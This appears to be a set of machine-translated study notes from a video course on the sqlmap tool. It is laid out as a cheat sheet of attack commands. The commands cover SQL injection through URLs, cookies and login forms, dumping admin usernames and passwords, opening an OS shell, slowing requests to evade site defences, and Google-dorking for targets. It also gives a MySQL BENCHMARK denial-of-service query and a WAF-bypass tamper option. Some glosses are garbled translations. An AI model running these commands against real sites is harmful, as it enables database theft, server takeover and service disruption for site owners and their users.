Wing Sqlmap Video notes

Access Injection

./sqlmap.py-u "url" injection judgment
./sqlmap.py-u "url"--tables stopwatch
./sqlmap.py-u "url"--columns-t admin guess Field
./sqlmap.py-u "url"--dump-t admin-c "Username,password"



MySQL Series courses
Sqlmap-u "url"--dbs get the database
Sqlmap-u "url"-D myslibrary--tables get the table in the database here is the data for the extract blasting
Sqlmap-u "url"-D myslibrary--t hy_admin--columns burst name
Sqlmap-u "url"-D myslibrary--t hy_admin-c id,user,password--dump get field contents


Cookie Injection
Sqlmap-u "url"--cookie "id=9"--table--level 2 Cookie Injection
Sqlmap-u "url"--cookie "id=9"--columns-t admin--level 2 exploded watch
Sqlmap-u "url"--cookie "id=9"--dump-t admin-c "Username,password"--level 2

Post Login Box Injection
Automatically search for forms
Sqlmap-u "url"--forms auto-injection
Sqlmap-u "url"--data "parameter" to specify parameter injection

Interactive write shell and command execution
Sqlmap-u "url"--os-cmd=ipconfig
Sqlmap-u "url"--os-shell get shell


Pseudo-Static injection
Sqlmap-u "url?id=54*.html"--dbs put a * key in the injected place and then inject
Sqlmap-u "url?id=54*.html"-D preem--tables get table
Sqlmap-u "url?id=54*.html"-D preem-t pe_user--columns get column
Sqlmap-u "url?id=54*.html"-D preem-t pe_user--c password
Sqlmap-u "url?id=54*.html"-D preem-t pe_user--c password--dump


Request delay bypasses some of the site's defenses
Sqlmap--dbs-u "url/40*.html"--delay 1 based on 1 seconds to get
Sqlmap--dbs-u "url/40*.html"--safe-freq 2 2 requests to access a correct interface


To put Google
Sqlmap-g inurl:php?id=1


MySQL Dos attack
Sqlmap-u "url"--sql-shell first get shell
Select Benchmark (999999999999,0X70726F626E646F70726F62616E646F70726F62616E646FF)


Bypassing the WAF firewall
Sqlmap-u "url"-V 3--dbs--batch--tamper "charencode.py" can bypass some filtering for injection
Sqlmap-u "url"--privileges View current user rights

Wing Sqlmap Video notes